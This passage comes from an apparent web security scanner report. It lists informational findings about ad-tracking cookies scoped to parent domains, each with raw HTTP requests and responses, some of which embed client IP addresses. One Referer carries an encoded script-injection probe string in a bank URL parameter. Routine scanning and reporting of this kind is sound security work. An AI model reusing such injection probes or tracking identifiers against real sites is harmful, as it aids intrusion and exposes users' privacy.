Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0awupiiJtt7A1ExkNK7HUtFp4B4dlWpgdgfBIoZ4uj4Tz8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Date: Sat, 23 Jul 2011 13:48:56 GMT
Location: http://rt.legolas-media.com/lgrt?ci=1&ei=21&ti=95&vi=11&sti=53&sei=21&sci=1&sai=0&smi=0&pbi=0&sts=1311428797730419&sui=8f8ac3d5-2ce2-4258-bdfe-d1053ae341c4&functional_area=it_systems_analysts&functional_area=information_technology&group=tech_business_professional&group=high_net_worth&industry=business_services&location=texas&seniority=executive
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe2QdMDSbkhgllExkNK7HUtFp4B4dlWpgdh9dravNQislaD8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0DuhotfR6IACScEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VejD8obWgUyKLdJRFsRyXovJ9iinFlQOiiO0JWr1XIQIIGVUprElhipPBLVBiitkUr3XlAisVjfEisQmveluipbPDZgisKdKFtdaUcN5Mm0U2xWtyvDfXYqVKvKL6ku8zbNip0rRSsokcAYJy1mH2jGbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiipErOGyEJmHzk4pTjPoYvsnwYXPBFhecOgTJVZ1mRrD6;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
X-Bizo-Usage: 1
Content-Length: 0
Connection: keep-alive

10.34. http://apr.lijit.com///www/delivery/ajs.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://apr.lijit.com
Path:	///www/delivery/ajs.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; expires=Sun, 22-Jul-2012 04:49:10 GMT; path=/; domain=.lijit.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET ///www/delivery/ajs.php?zoneid=127557&username=curse&numAds=1&premium=1&eleid=lijit_region_125814&abf=true&tid=127557_131139655517895814700c0cc&lijit_kw=&cb=62618671235&flv=0.0.0&time=23:49:15&ifr=1&loc=http%3A//www.curse.com/&referer=http%3A//c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html HTTP/1.1
Host: apr.lijit.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://c627028.r28.cf2.rackcdn.com/v36defaultsusa728x90btf.html
Cookie: ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; ljtrtb=eJyrVjJUslIyMTQxMzUxMTI0MDSwMDYzNDI1U6oFAE8JBbs%3D

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 04:49:10 GMT
Server: PWS/1.7.3.3
X-Px: ms iad-agg-n13 ( iad-agg-n25), ms iad-agg-n25 ( origin>CONN)
P3P: CP="CUR ADM OUR NOR STA NID"
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Content-Length: 8649
Content-Type: application/x-javascript; charset=UTF-8
Vary: Accept-Encoding
Connection: keep-alive
Set-Cookie: ljt_reader=8ca95226d166ed67e0a44dc3d93140ea; expires=Sun, 22-Jul-2012 04:49:10 GMT; path=/; domain=.lijit.com

var MAX_2b5ff28d = '';
MAX_2b5ff28d += "%3Cscript%20language%3D%22JavaScript%22%3Eif%20(typeof%20LJT_bC%20%3D%3D%20%22undefined%22)%20%7B%20LJT_bC%20%3D%20new%20Array()%3B%20%20%7D%20LJT_bC%5B127557%5
...[SNIP]...

10.35. http://ar.voicefive.com/bmx3/broker.pli previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:30 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:30 GMT; path=/; domain=.voicefive.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:30 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:30 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:30 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28688

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...

10.36. http://at.amgdgt.com/ads/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/ads/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAUeCrEhfYoCdG1PWFq58L0DU1XwxADA3gBdZHNS1RRFMB_5.ILJygXtgrBpppRBjQTGaVPJSjdCOL4F4yQQkxIK4m.NjJlBEERtLGkp2blF4owVtPCRbRwIQSBNURgMAYJKqmTSafXm3mr9zb3nvt7v3PuuQcoxTzawjo_glS_gLV1IABS82pqMoqZvYDVEkfqY5CLeszucb1R9UbVW8uz2yUtEdfrVK9DvXqPNSUwAwmstkmkNg2_EnmWzG70Yuy7yjaRuiHY_OGx1XuYl5ew4mGk4Srs7Cmwr33FmPEnWJ0TyIlm.DPisVtlmMdx7eEacuwOrGvN__0ll35WYaYXlPUjJ8dhd8Nj2aD291vfxdb.prW_nQJb7Hug_bWqF9N6r9XT93JzLl7_iLnfgXX6ABJZhtVMgaU_dGPefsE6M4CcnUeMvqnrpecz_l4q6._N5Pzml0xtB_zml0x9X8F0faNoOYeEdX6Zy_m7lH0KDeve.LpzkX2.NedCVerSWvnmJvvBvmKKJSBw8aHZK.d0M7ggFbqU97px0YSc0piaQLkckqAcliNyVEISdn5r_CwoffrOiYLvpVaj5zHn8OAzTRHVeKzZSTFsO8vQDWnQQzne3p_Qef_7_gLBl6Y2; Domain=.amgdgt.com; Expires=Sun, 21-Aug-2011 20:31:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/?t=pp&px=4552&rnd=%%Cache_buster%% HTTP/1.1
Host: at.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; UA=AAAAAQAUINnxSS5Jd4L8W.2Lfik2xO7YsQ4DA3gBdZHPS1RRFIC_c_GFI0iLWolgY80UA.YkMor9IgLTjSCMf8EIGsRItBIpbSNTSRAUQRtTempaqWEEYzUuhMKFC0EIxEECgylIUNGaVDpOb.at3uqc.777vXPPOcAxzNPfWI1jyNkJ2NwCfCDh12.nI5j317CaY0hdFLIRl9k3HW9cvXH1NvPs3tHmkOO1q9emXp3LrsQxg3Gs1mmkJgU78TxLZLa7MfaAsl2kdgR2f7ps4yHm1Q2sWBCp74G9IwW21l.MmXyO1T6FNDTB_pjL7pZjnsW0h9tI9X3Y0pr_.0us_KrCzCwqe4Ccn4SDbZdl_NrfX52Lrf3NaH97BbbU_1j7a1EvqvU.qKfzcv65dGcZ86gN6.JxJLQOG.kCSy1cx3xaxbo0iFyeR4zO1PFS82lvL5nx9t5lvfaXSP7xee0vkfz.A9P5jaL1LBLU_aW78m8p_xoY1dx4urOhUs.as4EqdWk587GPUrBvmWLxCXQ8MSVyVZPhRTmtoaLbORdNyQU9E_ZVyAnxS6WclFMSkGDu2tBcLvi_SI1eehkVNJS9UDeiyZumnDtq58JIr9TrRznX.lnCh4.AfzekpIo-; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUeCrEhfYoCdG1PWFq58L0DU1XwxADA3gBdZHNS1RRFMB_5.ILJygXtgrBpppRBjQTGaVPJSjdCOL4F4yQQkxIK4m.NjJlBEERtLGkp2blF4owVtPCRbRwIQSBNURgMAYJKqmTSafXm3mr9zb3nvt7v3PuuQcoxTzawjo_glS_gLV1IABS82pqMoqZvYDVEkfqY5CLeszucb1R9UbVW8uz2yUtEdfrVK9DvXqPNSUwAwmstkmkNg2_EnmWzG70Yuy7yjaRuiHY_OGx1XuYl5ew4mGk4Srs7Cmwr33FmPEnWJ0TyIlm.DPisVtlmMdx7eEacuwOrGvN__0ll35WYaYXlPUjJ8dhd8Nj2aD291vfxdb.prW_nQJb7Hug_bWqF9N6r9XT93JzLl7_iLnfgXX6ABJZhtVMgaU_dGPefsE6M4CcnUeMvqnrpecz_l4q6._N5Pzml0xtB_zml0x9X8F0faNoOYeEdX6Zy_m7lH0KDeve.LpzkX2.NedCVerSWvnmJvvBvmKKJSBw8aHZK.d0M7ggFbqU97px0YSc0piaQLkckqAcliNyVEISdn5r_CwoffrOiYLvpVaj5zHn8OAzTRHVeKzZSTFsO8vQDWnQQzne3p_Qef_7_gLBl6Y2; Domain=.amgdgt.com; Expires=Sun, 21-Aug-2011 20:31:12 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://cdn.amgdgt.com/base/pixels/transparent.gif
Content-Length: 0
Date: Fri, 22 Jul 2011 20:31:11 GMT

10.37. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=5fdd2b8-168.143.242.106-1311187256; expires=Sat, 20-Jul-2013 17:59:24 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=6035488&rn=211227803&c12=89164312-271382480-1311271170773&c7=http%3A%2F%2Fwww.myyearbook.com%2F&c4=http%3A%2F%2Fwww.myyearbook.com%2Findex&c5=index&c8=myYearbook&c9=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 21 Jul 2011 17:59:24 GMT
Connection: close
Set-Cookie: UID=5fdd2b8-168.143.242.106-1311187256; expires=Sat, 20-Jul-2013 17:59:24 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.38. http://b.scorecardresearch.com/p previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/p

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=5fdd2b8-168.143.242.106-1311187256; expires=Sat, 20-Jul-2013 18:01:12 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /p?c1=8&c2=6035784&c3=0&c4=240.456.4135.4710&c5=4442&c6=4292bea5-fe46-48cd-938b-a04020fccabc&c10=8202.21462.83305&c15=&cj=1&rn=1941631820087994368 HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.myyearbook.com/advertising/default.php?n=Pubmatic&section=None&size=728x90&site=MYB
Cookie: UID=5fdd2b8-168.143.242.106-1311187256

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Thu, 21 Jul 2011 18:01:12 GMT
Connection: close
Set-Cookie: UID=5fdd2b8-168.143.242.106-1311187256; expires=Sat, 20-Jul-2013 18:01:12 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.39. http://b.scorecardresearch.com/r previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/r

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=64dfc632-184.84.247.65-1305305561; expires=Mon, 22-Jul-2013 01:52:35 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=3000001&d.c=gif&d.o=msnportalbetarmc&d.x=199048501&d.t=page&d.u=http%3A%2F%2Fresearch.microsoft.com%2Fen-us%2F HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://research.microsoft.com/en-us/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Sat, 23 Jul 2011 01:52:35 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Mon, 22-Jul-2013 01:52:35 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.40. http://b.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=39460fd-77.67.87.8-1311271269; expires=Sat, 20-Jul-2013 18:42:40 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p110040101&c3=1355335&c4=1498970&c5=1&c6=2&c7=thu%20jul%2021%2018%3A00%3A58%202011&c8=http%3A%2F%2Fgames.myyearbook.com%2Flanding%2Fpool&c9=myYearbook%20%7C%20Games%20-%20Landing&c10=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&c15=&1311273765113 HTTP/1.1
Host: b.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27 2011&prad=1355335&arc=1498970&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Thu, 21 Jul 2011 18:42:40 GMT
Connection: close
Set-Cookie: UID=39460fd-77.67.87.8-1311271269; expires=Sat, 20-Jul-2013 18:42:40 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.41. http://bcp.crwdcntrl.net/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

aud=ABR4nGNgYGDw07pwjIGB0TDcvq2cwYqBQUCpgaEBKN4LpnguQ6ibYIq%2FEkwxr4HwqsCUaCKESoAI%2FgVTHEZgSuwxmOKaAabEC8CUyDmISjcwxRcGUfkJTPF%2Bg%2FAgFokegvCKII54D1HyB0yxSoEpwa8QlTshcswQ3i4ItQeivRPC2w%2FhdUNUSkMEF0KM5oO4E%2BJcMXEGEBC6BgkJiLVsvGBK4j6ECgRTkk4QyhHiFVGIN%2FeBKYHjYEroGYQqhhi9BcIrgahUhbjFFOKVAxDBVRC3%2BEMs8gJSAMzIYGs%3D; Domain=.crwdcntrl.net; Expires=Wed, 18-Apr-2012 13:46:46 GMT; Path=/
cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2FrQvH%2Fq95EMvAwGgYbt9WDhJj4BP43sbEwCD5WvA%2FiOsJpBkZGIEMxj8M6v67ihgZmDgYGIBiIEFG%2F10lqAIC33ajCiRUWDLDjYNJIBkLtAtosozAt6s4bRX4oY5TLqEihDjjT%2BEyQiahogrdyTXoAlnoAql4jEtBVczgI%2Fh9NtCRSvPP%2F2cECpwF0iAJydcC%2F8EqlMLOZLMAxVdMBhsn2cAAkme0ANIg9V8g%2FEAVJ2a4IkZLVEmtPaa4JdOqAkDGQzhQazGMDztTgdsEmf9H8EmeJsb10bhNCDtTAHMgA04H%2Bu8qIGyN1h4F3NYIfm9jhluDLhmoEkPYeFmzixwgRVPAIakEpIGScJPA6QFNEyMsLTBC0wkjMOEoAdly%2BuW4XRrAu49a9nh%2FKcGXbGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHJWhdkLzrIgs%2F3z9%2BKVV9jfjtszbtZncUt6f0nHJ5mGW1LOcAtuSWE1S7wOzjk5ExgWpsA8xwiyJh%2BvYmE1PMVMUDUTruzFwKCY%2FJ1wPPrnryNcDijsf4OnJBHOwJPQNvATdoOb9UJ8EbgIt2Roz0x8Olfjc3Ulbkn%2F%2FKPEuHo7PhMO45aMZ9mNz2EFuCUTLc8RrlbkZ%2FARjtJAFSm8yS6eZQ%2FhIAhTrSSsKPW%2BLGE3K1zCE15eL64jm4DNGgYGrtZJ1CqQAlWU8BTRKsq4JRWX1REOEJn%2F%2B4mpvLXxxo%2FXixu4c77Xi1u4JZUFHPCl22d4MvP6%2F8Q43ABPs0iNiGaRwv5ruE3gq3hLrWj2z3%2BBJyZn3STsVwBC9DUP; Domain=.crwdcntrl.net; Expires=Wed, 18-Apr-2012 13:46:46 GMT; Path=/
OAID=aa8272d1805895ab786afc266fb574e9; Domain=.crwdcntrl.net; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /4/c=520%7Crand=110304385%7Cpv=y%7Crt=ifr HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwU32xg4GB0dBFVKCNwZqBQUCJAQx6wSTPZQh1E0zxVzYwNDAwMK%2BB8KrAPNFEME80ASL4F0xxGIEpscdgimsGWKV4AZgncg6i0g1M8YVBVH4CU7zfILxKiJmHwPp4%2F0Ac8R7MEysC81ilwJTgV4jKnRDtzBDeLojL9kA0dEIE90N43RCV0hDBhRCj%2BcCUQCHEuRBXi4mDNQhdgwQIxHY2XjBH4j6ECgRTkk4QyhHiI1EwJb4PYuZxMCX0DEIVQ4zeAuGVQFSqQrxpCuGtgnjsAFhQwgviJH8gAQCeJDNO; cc=ACN4nGNQSEy0MDI3SjG0MDC1sDRNTDK3MEtMSzYyM0tLMjU3SbVkAAI%2F1Rc7%2Fm88kc3AwGjoIirQBhJj4BH43sbEwCDJwPAfxPUE0owMjEAGEIslVFjikhORfm6KU07ghz5OMwV%2BaOOW%2B3YFt5nfruIxUx2PH0LwmHkKp1xCRSpOOWFVJ5z2MfiEnclmYWA4u7cJLCvZAFQFlLYA0oxABV8gfMHvs5kZGJS27AMLngXSIBMk%2F%2F8HagIylAJVnJjhhjBaomrW2mOKWzKtKgBkPYQDNRHD%2BrAzFbhNkPl%2FBJ%2FkacK%2B899VQFhR2JkCmEMZcDo0UCUaXzgo4JYU%2FN7GDDceXTJQJYawA2XNLnKAFDWDQ1IJSAMl4SaBox9NE5Bm4rg4DcwHJwtGYDpRArLl9MtxuzSAdx%2B17PH%2BUoIvuGRwSwYuYqaWI7T2SOC2R2F%2FMz4XihKOFq76Bmq51M36HHIuhNkLzo0gsxX2t%2BN2rH%2F%2BXrya3azP4tbs%2FSUdn2Qabkk5wy24JYXVLPG6SVgNT8nh%2FSUfr%2BackzOBAWkKzKhArmLyd8JRFVTNhCsPMgDDbx3h%2FB8mnIEvLb3BI7mBn7AD3awX4jbBzXoRbsnQnpn4dK7GLRkmXIkvUR0lxtXb8ZlwGLdkPMtufA4rwC2ZaHmOcLUiP4OPmCJdCm8yi2fZQ0TloVpJWFHqfVnCbla4hCe8vF5cRzYBmzUMDFytk6hVIAWqKOEpolWUcUsqLqsjHCAy%2F%2FcTVhSooo03frxe3MCdqb1e3MItqSzggC%2FdPsOTmdf%2FJ8bhBniaRWpENIsU9l%2FDbQJfxVtqRbN%2F%2Fgs8MTnrJmG%2FAgDFeyba

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:46:46 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
